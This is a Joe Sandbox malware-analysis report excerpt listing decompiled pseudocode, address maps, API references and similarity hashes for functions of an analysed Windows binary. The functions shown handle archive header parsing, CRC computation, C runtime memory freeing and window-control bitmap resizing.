Download Yara Rule

C-Code - Quality: 100%

			E00E73A02(unsigned int __ecx) {
				intOrPtr _t39;
				signed int _t47;
				intOrPtr _t48;
				signed int _t55;
				signed int _t61;
				signed int _t66;
				intOrPtr _t78;
				signed int _t82;
				unsigned char _t84;
				signed int* _t86;
				intOrPtr _t87;
				unsigned int _t88;
				unsigned int _t89;
				signed int _t90;
				void* _t91;

				_t88 =  *(_t91 + 0x20);
				_t61 = 0;
				_t86 =  *(_t91 + 0x28);
				_t89 = __ecx;
				 *(_t91 + 0x18) = __ecx;
				_t86[3] = 0;
				if( *((intOrPtr*)(_t88 + 8)) != 0 ||  *_t88 <=  *((intOrPtr*)(__ecx + 0x84)) - 7 || E00E74A3C(__ecx) != 0) {
					E00E6A9D7(_t88,  ~( *(_t88 + 4)) & 0x00000007);
					 *(_t91 + 0x18) = E00E6A9EE(_t88) >> 8;
					E00E6A9D7(_t88, 8);
					_t66 =  *(_t91 + 0x14) & 0x000000ff;
					_t39 = (_t66 >> 0x00000003 & 0x00000003) + 1;
					 *((intOrPtr*)(_t91 + 0x10)) = _t39;
					if(_t39 == 4) {
						goto L3;
					}
					_t86[3] = _t39 + 2;
					_t86[1] = (_t66 & 0x00000007) + 1;
					 *(_t91 + 0x20) = E00E6A9EE(_t88) >> 8;
					E00E6A9D7(_t88, 8);
					if( *((intOrPtr*)(_t91 + 0x10)) <= _t61) {
						L9:
						_t84 =  *(_t91 + 0x14);
						 *_t86 = _t61;
						if((_t61 >> 0x00000010 ^ _t61 >> 0x00000008 ^ _t61 ^ _t84 ^ 0x0000005a) !=  *((intOrPtr*)(_t91 + 0x1c))) {
							goto L3;
						}
						_t47 =  *_t88;
						_t86[2] = _t47;
						_t23 = _t47 - 1; // -1
						_t48 =  *((intOrPtr*)(_t89 + 0x88));
						_t78 = _t23 + _t61;
						if(_t48 >= _t78) {
							_t48 = _t78;
						}
						 *((intOrPtr*)(_t89 + 0x88)) = _t48;
						_t86[4] = _t84 >> 0x00000006 & 0x00000001;
						_t86[4] = _t84 >> 7;
						return 1;
					}
					_t87 =  *((intOrPtr*)(_t91 + 0x10));
					_t90 = _t61;
					do {
						_t55 = E00E6A9EE(_t88) >> 8 << _t90;
						_t90 = _t90 + 8;
						_t61 = _t61 + _t55;
						_t82 =  *(_t88 + 4) + 8;
						 *_t88 =  *_t88 + (_t82 >> 3);
						 *(_t88 + 4) = _t82 & 0x00000007;
						_t87 = _t87 - 1;
					} while (_t87 != 0);
					_t86 =  *(_t91 + 0x28);
					_t89 =  *(_t91 + 0x18);
					goto L9;
				} else {
					L3:
					return 0;
				}
			}

0x00e73a08
0x00e73a0c
0x00e73a0f
0x00e73a13
0x00e73a15
0x00e73a19
0x00e73a1f
0x00e73a49
0x00e73a5c
0x00e73a60
0x00e73a69
0x00e73a74
0x00e73a75
0x00e73a7c
0x00000000
0x00000000
0x00e73a85
0x00e73a88
0x00e73a99
0x00e73a9d
0x00e73aa6
0x00e73ae1
0x00e73ae1
0x00e73af1
0x00e73afe
0x00000000
0x00000000
0x00e73b04
0x00e73b06
0x00e73b09
0x00e73b0c
0x00e73b12
0x00e73b16
0x00e73b18
0x00e73b18
0x00e73b1a
0x00e73b2a
0x00e73b2f
0x00000000
0x00e73b2f
0x00e73aa8
0x00e73aac
0x00e73aae
0x00e73aba
0x00e73abc
0x00e73ac2
0x00e73ac4
0x00e73acf
0x00e73ad1
0x00e73ad4
0x00e73ad4
0x00e73ad9
0x00e73add
0x00000000
0x00e73a37
0x00e73a37
0x00000000
0x00e73a37

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52abad45f79ce36a7b19b15fd8adf95ea09ff33d00a420e695b3def5234c655d
Instruction ID: 7f377f8ffedf8df2800aa251548d014d62011fca6343bb98a34591686b6d1301
Opcode Fuzzy Hash: 52abad45f79ce36a7b19b15fd8adf95ea09ff33d00a420e695b3def5234c655d
Instruction Fuzzy Hash: 233144B264474A8FCB14DF28C85226AFBD0FB91304F24992DE4C9E7342D734EA09CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E65EBC Relevance: .1, Instructions: 76
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00E65EBC(signed char _a4, signed char _a8, unsigned int _a12) {
				signed char _t49;
				signed char _t51;
				signed char _t67;
				signed char _t68;
				unsigned int _t72;
				unsigned int _t74;

				_t67 = _a8;
				_t49 = _a4;
				_t74 = _a12;
				if(_t74 != 0) {
					while((_t67 & 0x00000007) != 0) {
						_t49 = _t49 >> 0x00000008 ^  *(0xe9eeb0 + ( *_t67 & 0x000000ff ^ _t49 & 0x000000ff) * 4);
						_t67 = _t67 + 1;
						_a8 = _t67;
						_t74 = _t74 - 1;
						if(_t74 != 0) {
							continue;
						}
						goto L3;
					}
				}
				L3:
				if(_t74 >= 8) {
					_t72 = _t74 >> 3;
					do {
						_t51 = _t49 ^  *_t67;
						_t74 = _t74 - 8;
						_t68 =  *(_t67 + 4);
						_t67 = _a8 + 8;
						_a8 = _t67;
						_t49 =  *(0xe9eeb0 + (_t68 >> 0x18) * 4) ^  *(0xe9f2b0 + (_t68 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xe9f6b0 + (_t68 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xe9feb0 + (_t51 >> 0x18) * 4) ^  *(0xea02b0 + (_t51 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xea06b0 + (_t51 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xe9fab0 + (_t68 & 0x000000ff) * 4) ^  *(0xea0ab0 + (_t51 & 0x000000ff) * 4);
						_t72 = _t72 - 1;
					} while (_t72 != 0);
				}
				if(_t74 != 0) {
					do {
						_t49 = _t49 >> 0x00000008 ^  *(0xe9eeb0 + ( *_t67 & 0x000000ff ^ _t49 & 0x000000ff) * 4);
						_t67 = _t67 + 1;
						_t74 = _t74 - 1;
					} while (_t74 != 0);
				}
				return _t49;
			}

0x00e65ebf
0x00e65ec3
0x00e65ec7
0x00e65ecc
0x00e65ece
0x00e65ede
0x00e65ee5
0x00e65ee6
0x00e65ee9
0x00e65eec
0x00000000
0x00000000
0x00000000
0x00e65eec
0x00e65ece
0x00e65eee
0x00e65ef1
0x00e65efa
0x00e65efd
0x00e65efd
0x00e65eff
0x00e65f02
0x00e65f5f
0x00e65f62
0x00e65f76
0x00e65f78
0x00e65f78
0x00e65f7d
0x00e65f80
0x00e65f82
0x00e65f8d
0x00e65f94
0x00e65f95
0x00e65f95
0x00e65f82
0x00e65f9f

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7750cc30242978fecf6c3a15e5ec41c871bf5906b69337e307c2588cc69dcd12
Instruction ID: 16ae7f430a984dcde238447ab5c0933caf38d0d5b67517bed85a1579a3cef7d3
Opcode Fuzzy Hash: 7750cc30242978fecf6c3a15e5ec41c871bf5906b69337e307c2588cc69dcd12
Instruction Fuzzy Hash: 0121A732B205618FCB48CF2FEC904767755A78A351746812BEA46EB3D1C535FD29CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E8C592 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00E8C592(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0xe9ed50) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00E887FE(_t46);
							E00E8C171( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00E887FE(_t47);
							E00E8C26F( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00E887FE( *((intOrPtr*)(_t74 + 0x7c)));
						E00E887FE( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00E887FE( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00E887FE( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00E887FE( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00E887FE( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00E8C705( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0xe9e818) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00E887FE(_t31);
							E00E887FE( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00E887FE(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00E887FE(_t74);
			}

0x00e8c59a
0x00e8c59e
0x00e8c5a6
0x00e8c5af
0x00e8c5b4
0x00e8c5bb
0x00e8c5c3
0x00e8c5cb
0x00e8c5d6
0x00e8c5dc
0x00e8c5dd
0x00e8c5e5
0x00e8c5ed
0x00e8c5f8
0x00e8c5fe
0x00e8c602
0x00e8c60d
0x00e8c613
0x00e8c5b4
0x00e8c614
0x00e8c61c
0x00e8c62f
0x00e8c642
0x00e8c650
0x00e8c65b
0x00e8c660
0x00e8c669
0x00e8c671
0x00e8c672
0x00e8c678
0x00e8c67b
0x00e8c67e
0x00e8c685
0x00e8c687
0x00e8c68b
0x00e8c693
0x00e8c69a
0x00e8c6a0
0x00e8c6a1
0x00e8c6a1
0x00e8c6a8
0x00e8c6aa
0x00e8c6af
0x00e8c6b7
0x00e8c6bc
0x00e8c6bd
0x00e8c6bd
0x00e8c6c0
0x00e8c6c3
0x00e8c6c6
0x00e8c6c9
0x00e8c6c9
0x00e8c6db

APIs

___free_lconv_mon.LIBCMT ref: 00E8C5D6

Part of subcall function 00E8C171: _free.LIBCMT ref: 00E8C18E
Part of subcall function 00E8C171: _free.LIBCMT ref: 00E8C1A0
Part of subcall function 00E8C171: _free.LIBCMT ref: 00E8C1B2
Part of subcall function 00E8C171: _free.LIBCMT ref: 00E8C1C4
Part of subcall function 00E8C171: _free.LIBCMT ref: 00E8C1D6
Part of subcall function 00E8C171: _free.LIBCMT ref: 00E8C1E8
Part of subcall function 00E8C171: _free.LIBCMT ref: 00E8C1FA
Part of subcall function 00E8C171: _free.LIBCMT ref: 00E8C20C
Part of subcall function 00E8C171: _free.LIBCMT ref: 00E8C21E
Part of subcall function 00E8C171: _free.LIBCMT ref: 00E8C230
Part of subcall function 00E8C171: _free.LIBCMT ref: 00E8C242
Part of subcall function 00E8C171: _free.LIBCMT ref: 00E8C254
Part of subcall function 00E8C171: _free.LIBCMT ref: 00E8C266

_free.LIBCMT ref: 00E8C5CB

Part of subcall function 00E887FE: RtlFreeHeap.NTDLL(00000000,00000000,?,00E8C306,?,00000000,?,00000000,?,00E8C32D,?,00000007,?,?,00E8C72A,?), ref: 00E88814
Part of subcall function 00E887FE: GetLastError.KERNEL32(?,?,00E8C306,?,00000000,?,00000000,?,00E8C32D,?,00000007,?,?,00E8C72A,?,?), ref: 00E88826

_free.LIBCMT ref: 00E8C5ED
_free.LIBCMT ref: 00E8C602
_free.LIBCMT ref: 00E8C60D
_free.LIBCMT ref: 00E8C62F
_free.LIBCMT ref: 00E8C642
_free.LIBCMT ref: 00E8C650
_free.LIBCMT ref: 00E8C65B
_free.LIBCMT ref: 00E8C693
_free.LIBCMT ref: 00E8C69A
_free.LIBCMT ref: 00E8C6B7
_free.LIBCMT ref: 00E8C6CF

Strings

P, xrefs: 00E8C5A8

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: P
API String ID: 161543041-1343716551
Opcode ID: b4c6185f2560353c66a47071cb9be6a8bbae74b4fa43c7c8f987970f3f13791d
Instruction ID: 69d4a3de7dbb944d8fa540134163f72e6a7d6ca73fb7b0249761df0725e177f2
Opcode Fuzzy Hash: b4c6185f2560353c66a47071cb9be6a8bbae74b4fa43c7c8f987970f3f13791d
Instruction Fuzzy Hash: 9E314C72600205AFEB21BA39D985B5673E9BF02718F70742AE44CFB151EF31AC809B34

Uniqueness

Uniqueness Score: -1.00%

Function 00E7CFEE Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E7CFEE(void* __ecx, void* __edx, void* __eflags, void* __fp0, short _a24, struct HWND__* _a4124) {
				void _v0;
				intOrPtr _v4;
				intOrPtr _v12;
				struct HWND__* _t8;
				void* _t18;
				void* _t25;
				void* _t27;
				void* _t29;
				struct HWND__* _t32;
				struct HWND__* _t35;
				void* _t48;

				_t48 = __fp0;
				_t27 = __edx;
				E00E7E630();
				_t8 = E00E79F7A(__eflags);
				if(_t8 == 0) {
					L12:
					return _t8;
				}
				_t8 = GetWindow(_a4124, 5);
				_t32 = _t8;
				_t29 = 0;
				_t35 = _t32;
				if(_t32 == 0) {
					L11:
					goto L12;
				}
				while(_t29 < 0x200) {
					GetClassNameW(_t32,  &_a24, 0x800);
					if(E00E71AC4( &_a24, L"STATIC") == 0 && (GetWindowLongW(_t32, 0xfffffff0) & 0x0000001f) == 0xe) {
						_t25 = SendMessageW(_t32, 0x173, 0, 0);
						if(_t25 != 0) {
							GetObjectW(_t25, 0x18,  &_v0);
							_t18 = E00E79FBA(_v4);
							SendMessageW(_t32, 0x172, 0, E00E7A1BD(_t27, _t48, _t25, E00E79F99(_v12), _t18));
							DeleteObject(_t25);
						}
					}
					_t8 = GetWindow(_t32, 2);
					_t32 = _t8;
					if(_t32 != _t35) {
						_t29 = _t29 + 1;
						if(_t32 != 0) {
							continue;
						}
					}
					break;
				}
				goto L11;
			}

0x00e7cfee
0x00e7cfee
0x00e7cff3
0x00e7cff8
0x00e7cfff
0x00e7d0d6
0x00e7d0dc
0x00e7d0dc
0x00e7d011
0x00e7d017
0x00e7d019
0x00e7d01b
0x00e7d01f
0x00e7d0d3
0x00000000
0x00e7d0d5
0x00e7d026
0x00e7d03d
0x00e7d054
0x00e7d076
0x00e7d07a
0x00e7d084
0x00e7d08e
0x00e7d0ad
0x00e7d0b4
0x00e7d0b4
0x00e7d07a
0x00e7d0bd
0x00e7d0c3
0x00e7d0c7
0x00e7d0c9
0x00e7d0cc
0x00000000
0x00000000
0x00e7d0cc
0x00000000
0x00e7d0c7
0x00000000

APIs

GetWindow.USER32(?,00000005), ref: 00E7D011
GetClassNameW.USER32(00000000,?,00000800), ref: 00E7D03D

Part of subcall function 00E71AC4: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00E6B250,?,?,?,00E6B1FE,?,-00000002,?,00000000,?), ref: 00E71ADA

GetWindowLongW.USER32(00000000,000000F0), ref: 00E7D059
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00E7D070
GetObjectW.GDI32(00000000,00000018,?), ref: 00E7D084
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00E7D0AD
DeleteObject.GDI32(00000000), ref: 00E7D0B4
GetWindow.USER32(00000000,00000002), ref: 00E7D0BD

Strings

STATIC, xrefs: 00E7D043

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 4c572bf816a8ccb6953e72fedfda10cf6cb5515f0c43fd8ccf9c79ac959956f3
Instruction ID: d923ed51fc40b3604f32307184f529626713172013752340ae978860c3f79d49
Opcode Fuzzy Hash: 4c572bf816a8ccb6953e72fedfda10cf6cb5515f0c43fd8ccf9c79ac959956f3
Instruction Fuzzy Hash: 3F11367220A3107FE2316B719C0AFAF36AEAF54700F04E025FF49F50D2CA618D0B86A1

Uniqueness

Uniqueness Score: -1.00%

Function 00E891C1 Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E891C1(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0xe95ed0) {
					E00E887FE(_t52);
					_t26 = _a4;
				}
				E00E887FE( *((intOrPtr*)(_t26 + 0x3c)));
				E00E887FE( *((intOrPtr*)(_a4 + 0x30)));
				E00E887FE( *((intOrPtr*)(_a4 + 0x34)));
				E00E887FE( *((intOrPtr*)(_a4 + 0x38)));
				E00E887FE( *((intOrPtr*)(_a4 + 0x28)));
				E00E887FE( *((intOrPtr*)(_a4 + 0x2c)));
				E00E887FE( *((intOrPtr*)(_a4 + 0x40)));
				E00E887FE( *((intOrPtr*)(_a4 + 0x44)));
				E00E887FE( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00E8907B(5,  &_v8);
				_v8 =  &_a4;
				return E00E890CB(4,  &_v8);
			}

0x00e891c7
0x00e891ca
0x00e891d2
0x00e891d5
0x00e891da
0x00e891dd
0x00e891e1
0x00e891ec
0x00e891f7
0x00e89202
0x00e8920d
0x00e89218
0x00e89223
0x00e8922e
0x00e8923c
0x00e89244
0x00e8924d
0x00e89255
0x00e89269

APIs

_free.LIBCMT ref: 00E891D5

Part of subcall function 00E887FE: RtlFreeHeap.NTDLL(00000000,00000000,?,00E8C306,?,00000000,?,00000000,?,00E8C32D,?,00000007,?,?,00E8C72A,?), ref: 00E88814
Part of subcall function 00E887FE: GetLastError.KERNEL32(?,?,00E8C306,?,00000000,?,00000000,?,00E8C32D,?,00000007,?,?,00E8C72A,?,?), ref: 00E88826

_free.LIBCMT ref: 00E891E1
_free.LIBCMT ref: 00E891EC
_free.LIBCMT ref: 00E891F7
_free.LIBCMT ref: 00E89202
_free.LIBCMT ref: 00E8920D
_free.LIBCMT ref: 00E89218
_free.LIBCMT ref: 00E89223
_free.LIBCMT ref: 00E8922E
_free.LIBCMT ref: 00E8923C

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0054005b60524e38ebed7165bef9aa81baf1cfb2199473a922e64dd4b5d78d75
Instruction ID: a54403ccf88745fc9dcb3681858b54efcd88876215252abd56db3ab83738bfd6
Opcode Fuzzy Hash: 0054005b60524e38ebed7165bef9aa81baf1cfb2199473a922e64dd4b5d78d75
Instruction Fuzzy Hash: E411667A500148AFCB11FF59C942CD93BB5FF04350BA550A6F90C9F136DA32DE509B84

Uniqueness

Uniqueness Score: -1.00%

Function 00E620E7 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00E620E7(intOrPtr __ecx) {
				signed int _t135;
				void* _t137;
				signed int _t139;
				unsigned int _t140;
				signed int _t144;
				signed int _t161;
				signed int _t164;
				void* _t167;
				void* _t172;
				signed int _t175;
				signed char _t178;
				signed char _t179;
				signed char _t180;
				signed int _t182;
				signed int _t185;
				signed int _t187;
				signed int _t188;
				signed char _t220;
				signed char _t232;
				signed int _t233;
				signed int _t236;
				intOrPtr _t240;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				signed int _t257;
				signed int _t258;
				signed char _t262;
				signed int _t263;
				signed int _t265;
				intOrPtr _t272;
				intOrPtr _t275;
				intOrPtr _t278;
				intOrPtr _t314;
				signed int _t315;
				intOrPtr _t318;
				signed int _t322;
				void* _t323;
				void* _t324;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				intOrPtr* _t336;
				signed int _t339;
				void* _t340;
				signed int _t341;
				char* _t342;
				void* _t343;
				void* _t344;
				signed int _t348;
				signed int _t351;
				signed int _t366;

				E00E7E630();
				_t318 =  *((intOrPtr*)(_t344 + 0x20b8));
				 *((intOrPtr*)(_t344 + 0xc)) = __ecx;
				_t314 =  *((intOrPtr*)(_t318 + 0x18));
				_t135 = _t314 -  *((intOrPtr*)(_t344 + 0x20bc));
				if(_t135 <  *(_t318 + 0x1c)) {
					L104:
					return _t135;
				}
				_t315 = _t314 - _t135;
				 *(_t318 + 0x1c) = _t135;
				if(_t315 >= 2) {
					_t240 =  *((intOrPtr*)(_t344 + 0x20c4));
					while(1) {
						_t135 = E00E6C8E4(_t315);
						_t244 = _t135;
						_t348 = _t315;
						if(_t348 < 0 || _t348 <= 0 && _t244 == 0) {
							break;
						}
						_t322 =  *(_t318 + 0x1c);
						_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t322;
						if(_t135 == 0) {
							break;
						}
						_t351 = _t315;
						if(_t351 > 0 || _t351 >= 0 && _t244 > _t135) {
							break;
						} else {
							_t339 = _t322 + _t244;
							 *(_t344 + 0x28) = _t339;
							_t137 = E00E6C8E4(_t315);
							_t340 = _t339 -  *(_t318 + 0x1c);
							_t323 = _t137;
							_t135 = _t315;
							_t246 = 0;
							 *(_t344 + 0x24) = _t135;
							 *(_t344 + 0x20) = 0;
							if(0 < 0 || 0 <= 0 && _t340 < 0) {
								break;
							} else {
								if( *((intOrPtr*)(_t240 + 4)) == 1 && _t323 == 1 && _t135 == 0) {
									 *((char*)(_t240 + 0x1e)) = 1;
									_t232 = E00E6C8E4(_t315);
									 *(_t344 + 0x1c) = _t232;
									if((_t232 & 0x00000001) != 0) {
										_t236 = E00E6C8E4(_t315);
										if((_t236 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t236;
											 *((intOrPtr*)(_t240 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
										_t232 =  *(_t344 + 0x1c);
									}
									if((_t232 & 0x00000002) != 0) {
										_t233 = E00E6C8E4(_t315);
										if((_t233 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t233;
											 *((intOrPtr*)(_t240 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
									}
									_t246 =  *(_t344 + 0x20);
									_t135 =  *(_t344 + 0x24);
								}
								if( *((intOrPtr*)(_t240 + 4)) == 2 ||  *((intOrPtr*)(_t240 + 4)) == 3) {
									_t366 = _t135;
									if(_t366 > 0 || _t366 >= 0 && _t323 > 7) {
										goto L102;
									} else {
										_t324 = _t323 - 1;
										if(_t324 == 0) {
											_t139 = E00E6C8E4(_t315);
											__eflags = _t139;
											if(_t139 == 0) {
												_t140 = E00E6C8E4(_t315);
												 *(_t240 + 0x10c1) = _t140 & 0x00000001;
												 *(_t240 + 0x10ca) = _t140 >> 0x00000001 & 0x00000001;
												_t144 = E00E6C797(_t318) & 0x000000ff;
												 *(_t240 + 0x10ec) = _t144;
												__eflags = _t144 - 0x18;
												if(_t144 > 0x18) {
													E00E63F8F(_t344 + 0x38, 0x14, L"xc%u", _t144);
													_t257 =  *(_t344 + 0x28);
													_t167 = _t344 + 0x40;
													_t344 = _t344 + 0x10;
													E00E63F3A(_t257, _t240 + 0x28, _t167);
												}
												E00E6C846(_t318, _t240 + 0x10a1, 0x10);
												E00E6C846(_t318, _t240 + 0x10b1, 0x10);
												__eflags =  *(_t240 + 0x10c1);
												if( *(_t240 + 0x10c1) != 0) {
													_t325 = _t240 + 0x10c2;
													E00E6C846(_t318, _t240 + 0x10c2, 8);
													E00E6C846(_t318, _t344 + 0x30, 4);
													E00E6FBA2(_t344 + 0x58);
													E00E6FBE8(_t344 + 0x60, _t240 + 0x10c2, 8);
													_push(_t344 + 0x30);
													E00E6FAB1(_t344 + 0x5c);
													_t161 = E00E8009A(_t344 + 0x34, _t344 + 0x34, 4);
													_t344 = _t344 + 0xc;
													asm("sbb al, al");
													__eflags =  *((intOrPtr*)(_t240 + 4)) - 3;
													 *(_t240 + 0x10c1) =  ~_t161 + 1;
													if( *((intOrPtr*)(_t240 + 4)) == 3) {
														_t164 = E00E8009A(_t325, 0xe93668, 8);
														_t344 = _t344 + 0xc;
														__eflags = _t164;
														if(_t164 == 0) {
															 *(_t240 + 0x10c1) = _t164;
														}
													}
												}
												 *((char*)(_t240 + 0x10a0)) = 1;
												 *((intOrPtr*)(_t240 + 0x109c)) = 5;
												 *((char*)(_t240 + 0x109b)) = 1;
											} else {
												E00E63F8F(_t344 + 0x38, 0x14, L"x%u", _t139);
												_t258 =  *(_t344 + 0x28);
												_t172 = _t344 + 0x40;
												_t344 = _t344 + 0x10;
												E00E63F3A(_t258, _t240 + 0x28, _t172);
											}
											goto L102;
										}
										_t326 = _t324 - 1;
										if(_t326 == 0) {
											_t175 = E00E6C8E4(_t315);
											__eflags = _t175;
											if(_t175 != 0) {
												goto L102;
											}
											_push(0x20);
											 *((intOrPtr*)(_t240 + 0x1070)) = 3;
											_push(_t240 + 0x1074);
											L40:
											E00E6C846(_t318);
											goto L102;
										}
										_t327 = _t326 - 1;
